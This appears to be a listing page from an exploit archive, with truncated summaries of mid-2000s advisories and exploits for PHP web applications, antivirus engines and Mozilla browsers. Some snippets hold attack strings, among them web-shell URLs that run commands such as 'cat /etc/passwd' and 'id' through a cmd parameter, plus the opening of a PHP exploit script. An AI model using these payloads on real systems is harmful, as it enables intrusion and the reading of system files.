phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit

Exploit for unknown platform in category web applications ================================================================ phpWebSite arbitrary local inclusion, works with magicquotesgpc = Off\r\n"; echo "by rgod, mail: email protected\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if...

phpWebSite &lt;= 0.10.2 (hub_dir) Remote Commands Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "PHPWebSite = 0.10.2 remote cmmnds xctn\r\n"; echo "- arbitrary local inclusion, works with magicquotesgpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; i...

[Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow &#40;not default configuration&#41;

Overflow.pl Security Advisory 5 Clam AntiVirus Win32-UPX Heap Overflow not default configuration Vendor: Clam AntiVirus Affected version: Prior to 0.88.1 Vendor status: Fixed version released 0.88.1 Author: Damian Put [email protected] URL: http://www.overflow.pl/adv/clamavupxinteger.txt Date:...

phpkit_161r2_incl_xpl.txt

---------- PHPKit = v.1.6.1 release 2 remote code execution ------------------- software: site: www.phpkit.de description: a Content Management / homepage / community building software written in PHP language --------------------------------------------------------------------------------...

DocMGR &lt;= 0.54.2 arbitrary remote inclusion

--------------- DocMGR = 0.54.2 arbitrary remote inclusion -------------------- software: site: http://www.docmgr.org/ description: "DocMGR is a complete, web-based Document Management System DMS. It allows for the storage of any file type, and supports full-text indexing of the most popular...

EGS Enterprise Groupware System 1.0 rc4 remote commands execution &amp; FlySpray 0.9.7 remote commands execution

--------EGS Enterprise Groupware System 1.0 rc4 possibly prior versions------- remote code execution -------------------------------------------------------------------------------- software: site: http://egs.sourceforge.net/ description: "EGS is an Open Source business system released under the...

linpha_10_local.txt

------------- Linpha = 1.0 multiple arbitrary local inclusion ----------------- software: site: http://linpha.sourceforge.net/nuke/ description: " LinPHA is an easy to use, multilingual, flexible photo / image archive / album / gallery written in PHP. It uses a SQL database to store information...

[Full-disclosure] Symantec Antivirus Library Remote Heap Overflows

Date December 20, 2005 Vulnerability The Symantec Antivirus Library provides file format support for virus analysis. During decompression of RAR files Symantec is vulnerable to multiple heap overflows allowing attackers complete control of the systems being protected. These vulnerabilities can be...

sugar_suite_40beta.txt

SugarSuite Open Source "; fclose$fp; ? note: the file can have any extension, but not .php or any executable, it must be readable from a browser... now you can launch commands on target system: http://target/pathtosugar/suntzu.php?cmd=cat%20/etc/passwd this is my proof of concept exploit tool: ?p...

SimpleBBS &lt;= v1.1 remote commands execution in c by: unitedasia security crew

SugarSuite Open Source = 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList$REQUEST'module'; requireonce$beanFiles$bean; ... if registerglobals on & allowurlfopen on in php.ini, remote code...

SugarSuite Open Source &lt;= 4.0beta Remote code execution

SugarSuite Open Source = 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList$REQUEST'module'; requireonce$beanFiles$bean; ... if registerglobals on & allowurlfopen on in php.ini, remote code...

atutor151pl2.txt

ATutor 1.5.1pl2 SQL Injection / Remote commands execution software: site: http://www.atutor.ca/ description : "ATutor is an Open Source Web-based Learning Content Management System LCMS designed with accessibility and adaptability in mind." if magicquotesgpc off - SQL INJECTION vulnerable code in...

wagora420_xpl.txt

W-agora 4.2.0 Remote code execution / cross site scripting poc exploit software: site: http://w-agora.net/en/index.php description: "W-Agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on you...

mylittle15_16b.txt

My Little Forum 1.5 / 1.6beta SQL Injection software: site: http://www.mylittlehomepage.net/mylittleforum software: "A simple web-forum that supports classical thread view message tree as well as messagebord view to display the messages. Requires PHP 4.1 and a MySQL database." 1 look at the...

Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (v2)

No description provided by source. HTMLSCRIPT / SSSSSSS, SSSSSSS' PwnZilla 5 - One sploit fits all. FireFox optimized iSY iS; .sS Exploit for IDN host name heap buffer overrun in .SSSSSSS .sS Mozilla browsers FireFox, Mozilla and Netscape iS; .sS Copyright C 2003-2005 by Berend-Jan Wever. .SS...

Remote File Inclusion in MyGuestbook

Remote File Inclusion in MyGuestbook Date: 10/07/2005 Severity: High version: 0.6.1 The bug reside in form.inc.php3 The Vulnerable Code if $show 1 include "form.inc.php3"; Exploit : http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com Best...

PaFileDB31SQL.txt

SePro Advisory 5 PaFileDB 3.1 - SQL-Injection =========================================================== Vendor: PhpArena URL: http://www.phparena.net/ Date: 17.08.05 App.: PaFileDB Version: 3.1 Type: SQL-Injection Risc: High Credits: ================================ Newangels &...

PHPTB Topic Board &lt;= 20: Multiple PHP injection vulnerabilities

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version = 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyсski VXSfx Date: 17 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: PHPTB Top...

phptbInject.txt

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version = 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyñski VXSfx Date: 17 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: PHPTB Top...

[SVadvisory#13] - SQL injection in MYFAQ 1.0

SVadvisory13 title: SQL injection product: MYFAQ version: V1.0 site: http://vpontier.free.fr/ ===================================================================================== Vulnerability ============== 1 affichagefaq.php3 Code: -------------------------- ?php .... $Requete = "SELECT LIBELL...